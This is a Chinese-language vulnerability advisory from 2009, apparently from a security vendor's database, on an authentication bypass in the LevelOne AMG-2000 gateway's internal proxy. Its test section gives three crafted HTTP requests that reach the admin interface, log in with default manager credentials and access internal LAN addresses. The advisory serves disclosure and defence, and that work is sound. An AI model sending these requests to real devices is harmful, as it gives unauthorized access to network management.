安全研究

安全漏洞
LevelOne AMG-2000内部代理Host:头绕过安全限制漏洞

发布日期:2009-04-29
更新日期:2009-04-30

受影响系统:
Level-One AMG-2000 2.00.00 build00600
描述:
BUGTRAQ  ID: 34760

AMG-2000是专为中小型网络部署和管理设计的AP管理网关。

AMG-2000使用了一个内部Squid代理限制对无线LAN或Internet的访问,该代理默认运行在2128端口上。如果远程攻击者向代理发送了包含有特制Host:头和Request-URI的HTTP GET请求的话,就可以绕过认证访问管理接口。

<*来源:J. Greil
  
  链接:http://secunia.com/advisories/34926/
        http://marc.info/?l=bugtraq&m=124102938316439&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

a) 从WLAN访问管理界面登录页面:
=================================
GET http://127.0.0.1/ HTTP/1.1
Host: 192.168.0.1:2128
[...]
=================================

b) 以manager用户权限登录管理界面:
=================================
POST http://127.0.0.1/check.shtml HTTP/1.1
Host: 192.168.0.1:2128
[...]

username=manager&password=manager&Submit=ENTER
=================================

c) 访问私有LAN端口上配置的其他内部IP地址:
=================================
GET http://10.0.0.1/ HTTP/1.1
Host: 192.168.0.1:2128
[...]
=================================

建议:
厂商补丁:

Level-One
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://global.level1.com/products2.php?Id=821

浏览次数:2432
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障